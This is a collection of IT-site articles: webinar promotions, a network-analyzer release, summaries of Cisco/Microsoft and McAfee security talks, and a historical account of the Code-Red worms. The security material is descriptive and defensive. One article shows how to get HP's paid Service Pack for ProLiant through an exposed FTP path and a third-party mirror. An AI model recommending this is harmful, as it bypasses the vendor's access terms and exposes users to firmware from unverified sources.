New users can benefit from a fully-functional 30-day trial of Altaro VM Backup Unlimited Plus.

  • Hits: 6262

Free Live Demo Webinar: Windows Server 2019 in Action

windows server 2019 webinarSo you’ve heard all about Windows Server 2019 - now you can see it in action in a live demo webinar on November 8th! The last WS2019 webinar by Altaro was hugely popular with over 4,500 IT pros registering for the event. Feedback from gathered with that webinar and the most popular features will now be tested live by Microsoft MVP Andy Syrewicze. And you’re invited!

This deep-dive webinar will focus on:

  • Windows Admin Center
  • Containers on Windows Server
  • Storage Migration Service
  • Windows Subsystem for Linux
  • And more!

Demo webinars are a really great way to see a product in action before you decide to take the plunge yourself. It enables you to see the strengths and weaknesses first-hand and also ask questions that might relate specifically to your own environment. With the demand so high, the webinar is presented live twice on November 8th to help as many people benefit as possible.

altaro windows server 2019 in action webinar

The first session is at 2pm CET/8am EST/5am PST and the second is at 7pm CET/1pm EST/10am PST. With the record number of attendees for the last webinar, some people were unable to attend the sessions which were maxed out. It is advised you save your seat early for this webinar to keep informed and ensure you don’t miss the live event.

Save your seat: https://goo.gl/2RKrSe

While the event date has passed, it has been recorded and is available for viewing. All material are available as direct downloads. Click here to access the event.  

  • Hits: 6461

Windows Server 2019 Free Webinar

With Microsoft Ignite just around the corner, Windows Server 2019 is set to get its full release and the signs look good. Very good. Unless you’re part of the Windows Server insider program - which grants you access to the latest Windows Server Preview builds - you probably haven’t had a hands-on experience yet with Windows Server 2019 but the guys over at Altaro have and are preparing to host a webinar on the 3rd of October to tell you all about it.

altaro windows server 2019 webinar

The webinar will be held a week after Microsoft Ignite so it will cover the complete feature set included in the full release as well as a more in-depth look at the most important features in Windows Server 2019. Whenever a new version of Windows Server gets released there’s always a lot of attention and media coverage so it’s nice to have an hour long session where you can sit back and let a panel of Microsoft experts cut through the noise and give you all the information you need.

It’s also a great chance to ask your questions direct to those with the inside knowledge and receive answers live on air. Over 2000 people have now registered for this webinar and we’re going to be joining too. It’s free to register - what are you waiting for?

Save your seat: https://goo.gl/V9tYYb

Note: While this event has passed, its still available to view and download all related/presented material. Click on the above link to access the event recording.

  • Hits: 5265

Download HP Service Pack (SPP) for ProLiant Servers for Free (Firmware & Drivers .ISO)– Directly from HP!

hp-service-pack-for-proliant-spp-free-download-1aDownloading all necessary drivers and firmware upgrades for your HP Proliant server is very important, especially if hardware compatibility is critical for new operating system installations or virtualized environments (VMwareHyperV). Til recently, HP customers could download the HP Service Pack (SPP) for Proliant servers free of charge, but that’s no longer the story as HP is forcing customers to pay up in order to get access to its popular SPP package.

For those who are unaware, the HP SPP is a single ISO image that contains all the latest firmware software and drivers for HP’s Proliant servers, supporting older and newer operating systems including Virtualization platforms such as VMware and HyperV.

From HP’s prospective, you can either search and download for free each individual driver you think is needed for your server, or you buy a support contract and get everything in one neat ISO with all the necessary additional tools to make life easy – sounds attractive right? Well, it depends which way you look at it… not everyone is happy to pay for firmware and driver updates considering they are usually provided free of charge.

A quick search for HP Proliant firmware or drivers on any search engine will bring up HP’s Enterprise Support Center where the impression is given that we are one step away from downloading our much wanted SPP:

HP Proliant SPP Driver and Firmware Free Download

Figure 1. Attempting to download the HP Service Pack for ProLiant (SPP) ISO

When clicking on the ‘Obtain Software’ link, users receive the bad news:

hp-service-pack-for-proliant-spp-free-download-2

Figure 2. Sorry, you need to pay up to download the HP Service Pack ISO image!

Well, this is not the case – at least for now.

Apparently HP has set up this new policy to ensure customers pay for their server driver upgrades, however, they’ve forgotten (thankfully) one very important detail – securing the location of the HP Service Pack for ProLiant (SPP) ISO :)

To directly access the latest version of HP’s SPP ISO image simply click on the following URL or copy-paste it to your web browser:

ftp://ftp.hp.com/pub/softlib2/software1/cd-generic/p67859018/v113584/

HP’s FTP server is apparently wide-open allowing anonymous users to access and download not only the latest SPP ISO image, but pretty much browse the whole SPP repository and download any SSP version they want:

The latest (free) HP SPP ISO is just a click away!

Figure 3. The latest (free) HP SPP ISO is just a click away!

Simply click the “Up to higher level directory” link to move up and get access to all other versions of the SPP repository!

It’s great to see HP real cares about its customers and allows them to freely download the HP Service Pack (SPP) for Proliant servers. It’s not every day you get a vendor being so generous to its customers so if you’ve got a HP Proliant server, make sure you update its drivers and firmware while you still can!

Note: The above URL might not still be active - in this case you can download it from here:

https://www.systrade.de/download/SPP/

  • Hits: 305551

Colasoft Announces Release of Capsa Network Analyzer v8.2

colasoft-category-logoFebruary 23, 2016 – Colasoft LLC, a leading provider of innovative and affordable network analysis solutions, today announced the availability of Colasoft Capsa Network Analyzer v8.2, a real-time portable network analyzer for wired and wireless network monitoring, bandwidth analysis, and intrusion detection. The data flow display and protocols recognition are optimized in Capsa Network Analyzer 8.2.

Capsa v8.2 is capable of analyzing the traffic of wireless AP with 2 channels. Users can choose up to 2 wireless channels to analyze the total traffic which greatly enhances the accuracy of wireless traffic analysis. Hex display of decoded data is added in Data Flow sub-view in TCP/UDP Conversation view. Users can switch the display format between hex and text in Capsa v8.2.

Besides the optimizations of Data Flow sub-view in TCP/UDP Conversation view, with the continuous improvement of CSTRE (Colasoft Traffic Recognition Engine), Capsa 8.2 is capable of recognizing up to 1546 protocols and sub-protocols, which covers most of the mainstream protocols.colasoft-network-analyzer-v82

“We have also enhanced the interface of Capsa which improves user experience”, said Brian K. Smith, Vice President at Colasoft LLC, “the release of Capsa v8.2 provides a more comprehensive network analyze result to our customers.”

  • Hits: 9174

Safety in Numbers - Cisco & Microsoft

By Campbell Taylor

Recently I attended a presentation by Lynx Technology in London . The presentation was about the complimentary use of Cisco and Microsoft technology for network security. The title of the presentation was “End-to-end SecurityBriefing” and it set out to show the need for security within the network as well as at the perimeter. This document is an overview of that presentation but focuses on some key areas rather than covering the entire presentation verbatim. The slides for the original presentation can be found at http://www.lynxtec.com/presentations/.

The presentation opened with a discussion about firewalls and recommended a dual firewall arrangement as being the most effective in many situations. Their dual firewall recommendation was a hardware firewall at the closest point to the Internet. For this they recommended Cisco's PIX firewall. The recommendation for the second firewall was an application firewall. such as Microsoft's Internet Security and Acceleration server (ISA) 2004 or Checkpoint's NG products.

The key point made here is that the hardware firewall will typically filter traffic from OSI levels 1 – 4 thus easing the workload on the 2nd firewall which will filter OSI levels 1 – 7.

To elaborate, the first firewall can check that packets are of the right type but cannot look at the payload that may be malicious, malformed HTTP requests, viruses, restricted content etc.

This level of inspection is possible with ISA.

articles-members-contributions-sincm-1Figure 1. Dual firewall configuration
Provides improved performance and filtering for traffic from OSI levels 1 – 7.

 You may also wish to consider terminating any VPN traffic at the firewall so that the traffic can be inspected prior to being passed through to the LAN. End to end encryption is creating security issues, as some firewalls are not able to inspect the encrypted traffic. This provides a tunnel for malicious users through the network firewall.

Content attacks were seen as an area of vulnerability, which highlights the need to scan the payload of packets. The presentation particularly made mention of attacks via SMTP and Outlook Web Access (OWA)

Network vendors are moving towards providing a security checklist that is applied when a machine connects to the network. Cisco's version is called Network Access Control (NAC) and Microsoft's is called Network Access Quarantine Control (NAQC) although another technology called Network Access Protection (NAP) is to be implemented in the future.

Previously NAP was to be a part of Server 2003 R2 (R2 due for release end of 2005). Microsoft and Cisco have agreed to develop their network access technologies in a complementary fashion so that they will integrate. Therefore clients connecting to the Cisco network will be checked for appropriate access policies based on Microsoft's Active Directory and Group Policy configuration.

The following is taken directly from the Microsoft website: http://www.microsoft.com/windowsserver2003/techinfo/overview/quarantine.mspx

Note: Network Access Quarantine Control is not the same as Network Access Protection, which is a new policy enforcement platform that is being considered for inclusion in Windows Server "Longhorn," the next version of the Windows Server operating system.

Network Access Quarantine Control only provides added protection for remote access connections. Network Access Protection provides added protection for virtual private network (VPN) connections, Dynamic Host Configuration Protocol (DHCP) configuration, and Internet Protocol security (IPsec)-based communication.

 ISA Server & Cisco Technologies

ISA 2004 sits in front of the server OS that hosts the application firewall and filters traffic as it enters the server from the NIC. Therefore intercepting it before it is passed up OSI levels.

This means that ISA can still offer a secure external facing application firewall even when the underlying OS may be unpatched and vulnerable. Lynx advised that ISA 2000 with a throughput of 282 Mbps beat the next closest rival that was Checkpoint. ISA 2004 offers an even higher throughput of 1.59 Gbps (Network Computing Magazine March 2003)

articles-members-contributions-sincm-2

 

Cisco's NAC can be used to manage user nodes (desktops and laptops) connecting to your LAN. A part of Cisco's NAC is the Cisco Trust Agent which is a component that runs on the user node and talks to the AV server and RADIUS server. NAC targets the “branch office connecting to head office” scenario and supports AV vendor products from McAfee, Symantec and Trend. Phase 2 of Cisco's NAC will provide compliance checking and enforcement with Microsoft patching.

ISA can be utilized in these scenarios with any new connections being moved to a stub network. Checks are then run to make sure the user node meets the corporate requirements for AV, patching, authorisation etc. Compliance is enforced by NAC and NAQC/NAP. Once a connecting user node passes this security audit and any remedial actions are completed the user node is moved from the stub network into the LAN proper.

Moving inside the private network, the “Defence in depth” mantra was reiterated. A key point was to break up a flat network. For example clients should have little need to talk directly to each other, instead it should be more of a star topology with the servers in the centre and clients talking to the servers. This is where Virtual Local Area Networks (VLANs) would be suitable and this type of configuration makes it more difficult for network worms to spread.

Patch Management, Wireless & Security Tools

Patch Management

Patch management will ensure that known Microsoft vulnerabilities can be addressed (generally) by applying the relevant hot fix or service pack. Although not much detail was given Hot Fox Network Checker (Hfnetchk) was highlighted as an appropriate tool along with Microsoft Baseline Security Analyser (MBSA).

Restrict Software

Active Directory is also a key tool for administrators that manage user nodes running WXP and Windows 2000. With Group Policies for Active Directory you can prevent specified software from running on a Windows XP user node.

To do this use the “Software Restriction Policy”. You can then blacklist specific software based on any of the following:

  • A hash value of the software
  • A digital certificate for the software
  • The path for to the executable
  • Internet Zone rules

File, Folder and Share access

On the server all user access to files, folders and shares should be locked down via NTFS (requires Windows NT or higher). Use the concept of minimal necessary privilege.

User Node Connectivity

The firewall in Service Pack 2 for Windows XP (released 25 August 2004) can be used to limit what ports are open to incoming connections on the Windows XP user node.

Wireless

As wireless becomes more widely deployed and integrated more deeply in day-to-day operations we need to manage security and reliability. It is estimated Lynx that wireless installations can provide up to a 40% reduction in installation costs over standard fixed line installations. But wireless and the ubiquity of the web means that the network perimeter is now on the user node's desktop.

NAC and NAP, introduced earlier, will work with Extensible Authentication Protocol-Transport Level Security (EAP-TLS). EAP-TLS is used as a wireless authentication protocol. This means the wireless user node can still be managed for patching, AV and security compliance on the same basis as fixed line (e.g. Ethernet) connected user nodes.

EAP-TLS is scalable but requires Windows 2000 and Active Directory with Group Policy. To encrypt wireless traffic, 802.1x is recommended and if you wanted to investigate single sign on for your users across the domain then you could look at Public Key Infrastructure (PKI).

As part of your network and security auditing you will want to check the wireless aspect and the netstumbler tool will run on a wireless client and report on any wireless networks that have sufficient strength to be picked up.

As a part of your physical security for wireless networking you should consider placing Wireless Access Points (WAPs) in locations that provide restricted user access, for example in the ceiling cavity. Of course you will need to ensure that ypu achieve the right balance of physical security and usability, making sure that the signal is still strong enough to be used.

Layer 8 of the OSI model

The user was jokingly referred to as being the eighth layer in the OSI model and it is here that social engineering and other non-technical reconnaissance and attack methods can be attempted. Kevin Mitnick has written “The Art Of Deception: Controlling The Human Element Of Security” which is highly regarded in the IT security environment.

One counter measure to employ for social engineering is ensuring that all physical material is disposed of securely. This includes internal phone lists, hard copy documents, software user manuals etc. User education is one of the most important actions so you could consider user friendly training with workshops and reminders (posters, email memo's, briefings) to create a security conscious work place.

Free Microsoft Security Tools

MBSA, mentioned earlier, helps audit the security configuration of a user/server node. Other free Microsoft tools are the Exchange Best Practice Analyser, SQL Best Practice Analyser and the Microsoft Audit Collection System.

For conducting event log analysis you could use the Windows Server 2003 Resource Kit tool called EventcombMT. User education can be enhanced with visual reminders like a login message or posters promoting password security.

For developing operational guidelines the IT Infrastructure Library (ITIL) provides a comprehensive and customisable solution. ITIL was developed by the UK government and is now used internationally. Microsoft's own framework, Microsoft Operations Framework draws from ITIL. There is also assistance in designing and maintaining a secure network provided free by Microsoft called “Security Operations Guide”

Summary

Overall then, the aim is to provide layers of defence. For this you could use a Cisco PIX as your hardware firewall (first firewall) with a Microsoft ISA 2004 as your application layer firewall (second firewall). You may also use additional ISA 2004's for internal firewalls to screen branch to Head Office traffic.

The user node will authenticate to the domain. Cisco NAC and Microsoft NAQC/NAP will provide a security audit, authentication and enforcement on these user nodes connecting to the LAN that gain authorisation. If any action is required to make the user node meet the specified corporate security policies this will be carried out by moving the user node to a restricted part of the network.

Once the user node is authenticated, authorised and compliant with the corporate security policy then it will be allowed to connect to its full, allowed rights as part of the Private network. If using wireless the EAP-TLS may be used for the authentication and 802.1x for the encryption of the wireless traffic.

To help strengthen the LAN if the outer perimeter is defeated you need to look at segmenting the network. This will help minimise or delay malicious and undesirable activity from spreading throughout your private network. VLANs will assist with creating workgroups based on job function, allowing you to restrict the scope of network access a user may have.

For example rather than any user being able to browse to the Payroll server you can use VLANs to restrict access to that server to only the HR department. Routers can help to minimise the spread of network worms and undesirable traffic by introducing Access Control Lists (ACLs).

To minimise the chance of “island hopping” where a compromised machine is used to target another machine, you should ensure that the OS of all clients and Servers are hardened as much as possible – remove unnecessary services, patch, remove default admin shares if not used and enforce complex passwords.

Also stop clients from having easy access to another client machine unless it is necessary. Instead build more secure client to server access. The server will typically have better security because it is part of a smaller group of machines, thus more manageable and its is also a more high profile machine.

Applications should be patched and counter measures put in place for known vulnerabilities. This includes Microsoft Exchange, SQL and IIS, which are high on a malicious hackers attack list. The data on the servers can then be secured using NTFS permissions to only permit those who are authorised to access the data in the manner you specify.

Overall the presentation showed me that a more integrated approach was being taken by vendors to Network security. Interoperability is going to be important to ensure the longevity of your solution but it is refreshing to see two large players in the IT industry like Cisco and Microsoft working together.

  • Hits: 39262

A Day In The Antivirus World

This article written by Campbell Taylor - 'Global', is a review of the information learnt from a one day visit to McAfee and includes personal observations or further information that he felt were useful to the overall article. He refers to malicious activity as a term to cover the range of activity that includes worms, viruses, backdoors, Trojans, and exploits. Italics indicate a personal observation or comment.

In December 2004 I was invited to a one day workshop at McAfee's offices and AVERT lab at Aylesbury in England . As you are probably aware McAfee is an anti-virus (AV) vendor and AVERT ( Anti-Virus Emergency Response Team) is McAfee's AV research lab.

This visit is the basis for the information in this document and is split into 4 parts:

1) THREAT TRENDS

2) SECURITY TRENDS

3) SOME OF TODAY'S SECURITY RESPONSES

4) AVERT LAB VISIT

Threat Trends

Infection by Browsing

Browsing looks set to become a bigger method of infection by a virus in the near future but there was also concern about the potential for a ‘media independent propagation by a virus', that I found very interesting.

 

Media Independent propagation

By media independent I mean that the virus is not constrained to travelling over any specific media like Ethernet or via other physical infrastructure installations. McAfee's research showed a security risk with wireless network deployment which is discussed in the Security Trends section of this document.

So what happens if a virus or worm were able to infect a desktop via any common method and that desktop was part of a wired and wireless network? Instead of just searching the fixed wire LAN for targets, the virus/worm looks for wireless networks that are of sufficient strength to allow it to jump into that network.

You can draw up any number of implications from this but my personal observation is that this means you have to consider the wireless attack vector as seriously as the fixed wire attack vector. This reinforces the concept that the network perimeter is no longer based on the Internet/Corporate LAN perimeter and instead it now sits wherever interaction between the host machine and foreign material exists. This could be the USB memory key from home, files accessed on a compromised server or the web browser accessing a website.

An interesting observation from the McAfee researcher was that this would mean a virus/worm distribution starting to follow a more biological distribution. In other words you would see concentrations of the virus in metropolitan areas and along key meeting places like cyber cafes or hotspots.

Distributed Denial of Service (DDos)

DDoS attacks are seen as continuing threat because of the involvement of criminals in the malicious hacker/cracker world. Using DDoS for extortion provides criminals with a remote control method of raising capital.

Virus writers are starting to instruct their bot armies to coordinate their time keeping by accessing Internet based time servers. This means that all bots are using a consistent time reference. In turn this makes any DDos that much more effective than relying on independent sources of time reference.

As a personal note, Network administrators and IT security people might consider who needs access to Internet based Time servers. You may think about applying an access control list (ACL) that only permits NTP from one specified server in your network and denying all other NTP traffic. The objective is to reduce the chances of any of your machines being used as part of a bot army for DDos attacks.

Identity Theft

This was highlighted as a significant likely trend in the near future and is part of the increase in Phishing attacks that have been intercepted by MessageLabs.

SOCKS used in sophisticated identify theft

McAfee did not go into a lot of detail about this but they pointed out that SOCKS is being used by malicious hackers to bypass corporate firewalls because SOCKS is a proxy service. I don't know much about SOCKS so this is more of a heads up about technologies being used maliciously in the connected world.

Privacy versus security

One of the speakers raised the challenge of privacy versus security. Here the challenge is promoting the use of encrypted traffic to provide protection for data whilst in transit but then the encrypted traffic is more difficult to scan with AV products. In some UK government networks no encrypted traffic is allowed so that all traffic can be scanned.

In my opinion this is going to become more of an issue as consumers and corporates create a demand for the perceived security of HTTPS, for example.

Flexibility versus security

In the McAfee speaker's words this is about “ease of use versus ease of abuse”. If security makes IT too difficult to use effectively then end users will circumvent security.

Sticky notes with passwords on the monitor anyone?


Security Trends

Wireless Security

Research by McAfee showed that, on average, 60% of all wireless networks were deployed insecurely (many without even the use of WEP keys)

The research was conducted by war driving with a laptop running net stumbler in London and Reading (United Kingdom) and Amsterdam (Netherlands). The research also found that in many locations in major metropolitan areas there was often an overlap of several wireless networks of sufficient strength to attempt a connection.

AV product developments

AV companies are developing and distributing AV products for Personal Digital Assistants (PDAs) and smart phones. For example, F-secure, a Finnish AV firm, is providing AV software for Nokia (which, not surprisingly is based in Finland).

We were told that standard desktop AV products are limited to being reactive in many instances, as they cannot detect a virus until it is written to hard disk. Therefore in a Windows environment - Instant Messaging, Outlook Express and web surfing with Internet Explorer, the user is exposed, as web content is not necessarily written to hard disk.

This is where the concept of desktop firewalls or buffer overflow protection is important. McAfee's newest desktop product, VirusScan 8.0i, offers access protection that is designed to prevent undesired remote connections; it also offers buffer overflow protection. However it is also suggested that a firewall would be useful to stop network worms.

An interesting program that the speaker mentioned (obviously out of earshot of the sales department) was the Proxomitron. The way it was explained to me was that Proxomitron is a local web proxy. It means that web content is written to the hard disk and then the web browser retrieves the web content from the proxy. Because the web content has been written to hard disk your standard desktop AV product can scan for malicious content.

I should clarify at this point that core enterprise/server AV solutions like firewall/web filtering and email AV products are designed to scan in memory as well as the hard disk.

I guess it is to minimise the footprint and performance impact that the desktop AV doesn't scan memory. No doubt marketing is another factor – why kill off your corporate market when it generates substantial income?

AV vendors forming partnerships with Network infrastructure vendors

Daily AV definition file releases

McAfee is moving daily definition releases in an attempt to minimise the window of opportunity for infection.

Malicious activity naming

A consistent naming convention that is vendor independent is run by CVE (Common Vulnerabilities and Exposures). McAfee will be including the CVE reference to malicious activity that is ranked by McAfee as being of medium threat or higher.

Other vendors may use a different approach but I feel the use of a common reference method will help people in the IT industry to correlate information data about malicious activity form different sources rather than the often painful (for me at least) hunting exercise we engage in to get material from different vendors or sources about malicious activity.

AV products moving from reactive detection to proactive blocking of suspect behaviour

New AV products from McAfee (for example VirusScan 8.0i) are including suspect behaviour detection and blocking as well as virus signature detection. This acknowledges that virus detection by a virus signature is a reactive action. So by blocking suspicious behaviour you can prevent potential virus activity before a virus signature has been developed. For example port blocking can be used to stop a mydoom style virus from opening ports for backdoor access.

A personal observation is that Windows XP Service Pack 2 does offer a Firewall but this is a limited firewall as it provides port blocking only for traffic attempting to connect to the host. Therefore it would not stop a network worm searching for vulnerable targets.

Some of Today's Security Responses

Detecting potential malicious activity - Network

Understand your network's traffic patterns and develop a baseline of network traffic. If you see a significant unexpected change in your network traffic you may be seeing the symptoms of malicious activity.

Detecting potential malicious activity - Client workstation

On a Windows workstation if you run “ netstat –a ” from the command line you can see the ports that the workstation has open and to whom it's trying to connect. If you see ports open that are unexpected, especially ones outside of the well known range (1 – 1024) or connections to unexpected IP addresses, then further investigation may be worthwhile.

Tightening Corporate Email security

With the prevalence of mass mailing worms and viruses McAfee offered a couple of no/low cost steps that help to tighten your email security.

  1. Prevent all SMTP traffic in/outwards that is not for your SMTP server
  2. Prevent MX record look up
  3. Create a honeypot email address in your corporate email address book so that any mass mail infections will send an email to this honeypot account and alert you to the infection. It was suggested that the email account be inconspicuous e.g. not containing any admin, net, help, strings in the address. Something like '#_#@your domain' would probably work.

AVERT LAB VISIT

We were taken to the AVERT labs where we were shown the path from the submission of a suspected malicious sample through to the testing of the suspect sample and then to the development of the removal tools and definition files, their testing and deployment.

Samples are collected by submission via email, removable media via mail (e.g. CD or floppy disk) or captured via AVERT's honeypots in the wild.

Once a sample is received a copy is run on a goat rig. A goat rig is a test/sacrificial machine. The phrase “goat rig” comes from the practice in the past of tethering a goat in a clearing to attract animals the hunter wanted to capture. In this case the goat rig was a powerful workstation running several virtual machines courtesy of VMware software that were in a simulated LAN. The simulation went so far as to include a simulated access point to the Internet and Internet based DNS server.

The sample is run on the goat rig for observational tests. Observational tests are the first tests conducted after the sample has been scanned for known malicious signature files. Naturally malicious activity is not often visible to the common end user, so observable activity means executing the sample and looking for files or registry keys created by the sample, new ports opened and unexpected suspicious network traffic from the test machine.

As a demonstration the lab technicians ran a sample of the mydoom virus and the observable behaviour at this point was the opening of port 3127 on the test host, unexpected network traffic from the test host and newly created registry keys. The lab technician pointed out that a firewall on the host, blocking unused ports, would have very easily prevented mydoom from spreading.

Following observational tests the sample will be submitted for reverse engineering if it's considered complex enough or it warrants further investigation.

AVERT engineers that carry out reverse engineering are located throughout the world and I found it interesting that these reverse engineers and Top AV researchers maintain contact with their peers in the other main AV vendors. This collaboration is not maintained by the AV vendors but by the AV engineers so that it is based on a trust relationship. This means that the knowledge about a sample that has been successfully identified and reverse engineered to identify payload, characteristics etc is passed to others in the AV trust group.

From the test lab we went through to the AV definition testing lab. After the detection rules and a new AV definition have been written the definition is submitted to this lab. The lab runs an automated test that applies the updated AV definition on most known Operating System platforms and against a wide reference store of known applications.

The intention is to prevent the updated AV definition from giving false positives on known safe applications.

Imagine the grief if an updated AV definition provided a false positive on Microsoft's Notepad!

One poor soul was in a corner busy surfing the web and downloading all available material to add to their reference store of applications for testing future AV definitions.

After passing the reference store test an email is sent to all subscribers of the McAfee DAT notification service and the updated AV definition is made available on the McAfee website for download.

In summary, the AVERT lab tour was an informative look behind the scenes, without much of a sales pitch, and I found the co-operation amongst AV researchers of different AV companies very interesting.

  • Hits: 41372

Code-Red Worms: A Global Threat

The first incarnation of the Code-Red worm (CRv1) began to infect hosts running unpatched versions of Microsoft's IIS webserver on July 12th, 2001. The first version of the worm uses a static seed for it's random number generator. Then, around 10:00 UTC in the morning of July 19th, 2001, a random seed variant of the Code-Red worm (CRv2) appeared and spread. This second version shared almost all of its code with the first version, but spread much more rapidly. Finally, on August 4th, a new worm began to infect machines exploiting the same vulnerability in Microsoft's IIS webserver as the original Code-Red virus. Although the new worm shared almost no code with the two versions of the original worm, it contained in its source code the string "CodeRedII" and was thus named CodeRed II. The characteristics of each worm are explained in greater detail below.

The IIS .ida Vulnerability

On June 18, 2001 eEye released information about a buffer-overflow vulnerability in Microsoft's IIS webservers.

The remotely exploitable vulnerability was discovered by Riley Hassell. It allows system-level execution of code and thus presents a serious security risk. The buffer-overflow is exploitable because the ISAPI (Internet Server Application Program Interface) .ida (indexing service) filter fails to perform adequate bounds checking on its input buffers.

Code-Red version 1 (CRv1)

On July 12, 2001, a worm began to exploit the aforementioned buffer-overflow vulnerability in Microsoft's IIS webservers. Upon infecting a machine, the worm checks to see if the date (as kept by the system clock) is between the first and the nineteenth of the month. If so, the worm generates a random list of IP addresses and probes each machine on the list in an attempt to infect as many computers as possible. However, this first version of the worm uses a static seed in its random number generator and thus generates identical lists of IP addresses on each infected machine.

The first version of the worm spread slowly, because each infected machine began to spread the worm by probing machines that were either infected or impregnable. The worm is programmed to stop infecting other machines on the 20th of every month. In its next attack phase, the worm launches a Denial-of-Service attack against www1.whitehouse.gov from the 20th-28th of each month.

On July 13th, Ryan Permeh and Marc Maiffret at eEye Digital Security received logs of attacks by the worm and worked through the night to disassemble and analyze the worm. They christened the worm "Code-Red" both because the highly caffeinated "Code Red" Mountain Dew fueled their efforts to understand the workings of the worm and because the worm defaces some web pages with the phrase "Hacked by Chinese". There is no evidence either supporting or refuting the involvement of Chinese hackers with the Code-Red worm.

The first version of the Code-Red worm caused very little damage. The worm did deface web pages on some machines with the phrase "Hacked by Chinese." Although the worm's attempts to spread itself consumed resources on infected machines and local area networks, it had little impact on global resources.

The Code-Red version 1 worm is memory resident, so an infected machine can be disinfected by simply rebooting it. However, once-rebooted, the machine is still vulnerable to repeat infection. Any machines infected by Code-Red version 1 and subsequently rebooted were likely to be reinfected, because each newly infected machine probes the same list of IP addresses in the same order.

Code-Red version 2

At approximately 10:00 UTC in the morning of July 19th, 2001 a random seed variant of the Code-Red worm (CRv2) began to infect hosts running unpatched versions of Microsoft's IIS webserver. The worm again spreads by probing random IP addresses and infecting all hosts vulnerable to the IIS exploit. Code-Red version 2 lacks the static seed found in the random number generator of Code-Red version 1. In contrast, Code-Red version 2 uses a random seed, so each infected computer tries to infect a different list of randomly generated IP addresses. This seemingly minor change had a major impact: more than 359,000 machines were infected with Code-Red version 2 in just fourteen hours.

Because Code-Red version 2 is identical to Code-Red version 1 in all respects except the seed for its random number generator, its only actual damage is the "Hacked by Chinese" message added to top level webpages on some hosts. However, Code-Red version 2 had a greater impact on global infrastructure due to the sheer volume of hosts infected and probes sent to infect new hosts. Code-Red version 2 also wreaked havoc on some additional devices with web interfaces, such as routers, switches, DSL modems, and printers. Although these devices were not infected with the worm, they either crashed or rebooted when an infected machine attempted to send them a copy of the worm.

Like Code-Red version 1, Code-Red version 2 can be removed from a computer simply by rebooting it. However, rebooting the machine does not prevent reinfection once the machine is online again. On July 19th, the probe rate to hosts was so high that many machines were infected as the patch for the .ida vulnerability was applied.

CodeRedII

On August 4, 2001, an entirely new worm, CodeRedII began to exploit the buffer-overflow vulnerability in Microsoft's IIS webservers. Although the new worm is completely unrelated to the original Code-Red worm, the source code of the worm contained the string "CodeRedII" which became the name of the new worm.

Ryan Permeh and Marc Maiffret analyzed CodeRedII to determine its attack mechanism. When a worm infects a new host, it first determines if the system has already been infected. If not, the worm initiates its propagation mechanism, sets up a "backdoor" into the infected machine, becomes dormant for a day, and then reboots the machine. Unlike Code-Red, CodeRedII is not memory resident, so rebooting an infected machine does not eliminate CodeRedII.

After rebooting the machine, the CodeRedII worm begins to spread. If the host infected with CodeRedII has Chinese (Taiwanese) or Chinese (PRC) as the system language, it uses 600 threads to probe other machines. All other machines use 300 threads.

CodeRedII uses a more complex method of selecting hosts to probe than Code-Red. CodeRedII generates a random IP address and then applies a mask to produce the IP address to probe. The length of the mask determines the similarity between the IP address of the infected machine and the probed machine. 1/8th of the time, CodeRedII probes a completely random IP address. 1/2 of the time, CodeRedII probes a machine in the same /8 (so if the infected machine had the IP address 10.9.8.7, the IP address probed would start with 10.), while 3/8ths of the time, it probes a machine on the same /16 (so the IP address probed would start with 10.9.).

Like Code-Red, CodeRedII avoids probing IP addresses in 224.0.0.0/8 (multicast) and 127.0.0.0/8 (loopback). The bias towards the local /16 and /8 networks means that an infected machine may be more likely to probe a susceptible machine, based on the supposition that machines on a single network are more likely to be running the same software as machines on unrelated IP addresses.

The CodeRedII worm is much more dangerous than Code-Red because CodeRedII installs a mechanism for remote, root-level access to the infected machine. Unlike Code-Red, CodeRedII neither defaces web pages on infected machines nor launches a Denial-of-Service attack. However, the backdoor installed on the machine allows any code to be executed, so the machines could be used as zombies for future attacks (DoS or otherwise).

A machine infected with CodeRedII must be patched to prevent reinfection and then the CodeRedII worm must be removed. A security patch for this vulnerability is available from Microsoft at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp. A tool that disinfects a computer infected with CodeRedII is also available: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878.

CAIDA Analysis

CAIDA's ongoing analysis of the Code-Red worms includes a detailed analysis of the spread of Code-Red version 2 on July 19, 2001, a follow-up survey of the patch rate of machines infected on July 19th, and dynamic graphs showing the prevalence of Code-Red version 2 and CodeRedII worldwide.

The Spread of the Code-Red Worm (CRv2)

An analysis of the spread of the Code-Red version 2 worm between midnight UTC July 19, 2001 and midnight UTC July 20, 2001.

On July 19, 2001 more than 359,000 computers were infected with the Code-Red (CRv2) worm in less than 14 hours. At the peak of the infection frenzy, more than 2,000 new hosts were infected each minute. 43% of all infected hosts were in the United States, while 11% originated in Korea followed by 5% in China and 4% in Taiwan. The .NET Top Level Domain (TLD) accounted for 19% of all compromised machines, followed by .COM with 14% and .EDU with 2%. We also observed 136 (0.04%) .MIL and 213 (0.05%) .GOV hosts infected by the worm. An animation of the geographic expansion of the worm is available.

Animations

To help us visualize the initial spread of Code-Red version 2, Jeff Brown created an animation of the geographic spread of the worm in five minute intervals between midnight UTC on July 19, 2001 and midnight UTC on July 20, 2001. For the animation, infected hosts were mapped to latitude and longitude values using ipmapper, and aggregated by the number at each unique location. The radius of each circle is sized relative to the infected hosts mapped to the center of the circle using the formula 1+ln(total-infected-hosts). When smaller circles are obscured by larger circles, their totals are not combined with the larger circle; the smaller data points are hidden from view.

Although we attempted to identify the geographic location of each host as accurately
as possible, in many cases the granularity of the location was limited to the country of origin. We plot these hosts at the center of their respective countries. Thus, the rapidly expanding central regions of most countries is an artifact of the localization method.

Animations created by Jeff Brown (UCSD CSE department), based on analysis by David Moore (CAIDA at SDSC).
Copyright UC Regents 2001.

About Code-Red

The first incarnation of the Code-Red worm (CRv1) began to infect hosts running unpatched versions of Microsoft's IIS webserver on July 12th, 2001. The first version of the worm uses a static seed for it's random number generator. Then, around 10:00 UTC in the morning of July 19th, 2001, a random seed variant of the Code-Red worm (CRv2) appeared and spread. This second version shared almost all of its code with the first version, but spread much more rapidly. Finally, on August 4th, a new worm began to infect machines exploiting the same vulnerability in Microsoft's IIS webserver as the original Code-Red virus. Although the new worm shared almost no code with the two versions of the original worm, it contained in its source code the string "CodeRedII" and was thus named CodeRed II. The characteristics of each worm are explained in greater detail below.

The IIS .ida Vulnerability

Detailed information about the IIS .ida vulnerability can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AD20010618.html).

